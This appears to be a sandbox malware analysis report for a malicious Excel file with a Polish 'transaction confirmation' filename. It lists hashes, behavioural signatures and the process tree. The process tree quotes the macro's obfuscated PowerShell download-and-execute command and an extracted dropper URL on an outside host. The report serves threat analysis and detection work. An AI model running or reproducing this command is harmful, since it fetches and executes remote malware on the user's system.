Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
112s -
max time network
118s -
platform
windows7_x64 -
resource
win7 -
submitted
14/07/2020, 14:07
General
-
Target
Potwierdzenie transakcji (5).xls
-
Size
856KB
-
MD5
92d6e6b45a4275700d0f6f57e1b41609
-
SHA1
2d9aa61c33bdcc875e610edac331901ed59a5b44
-
SHA256
2705cadf0dff4e6476415d0d51fafc2e121bdfde7e8649004bf1294a85f17a11
-
SHA512
2d25de03fa17fdbaf4ec0370fbc339a98aca9dd2f203f6ff243c7f61d82108fcea9f61f42b025cf76bcacef86c252d45561b7c8a42d2e00521ca352c88b43158
Score
10/10
Malware Config
Extracted
Language
ps1
Source
URLs
ps1.dropper
http://officeservicecorp.biz/Lab.jpg
Signatures
-
Suspicious use of FindShellTrayWindow 2 IoCs
-
Suspicious behavior: AddClipboardFormatListener 1 IoCs
-
Suspicious use of SetWindowsHookEx 3 IoCs
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
-
Suspicious use of WriteProcessMemory 3 IoCs
-
Suspicious use of AdjustPrivilegeToken 1 IoCs
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
Processes
-
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde "C:\Users\Admin\AppData\Local\Temp\Potwierdzenie transakcji (5).xls"1⤵
- Suspicious use of FindShellTrayWindow
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -Command IEX (New-Object('Net.WebClient')).'DoWnloadsTrInG'('http://officeservicecorp.biz/Lab.jpg')2⤵
- Process spawned unexpected child process
- Suspicious use of AdjustPrivilegeToken
- Suspicious behavior: EnumeratesProcesses
-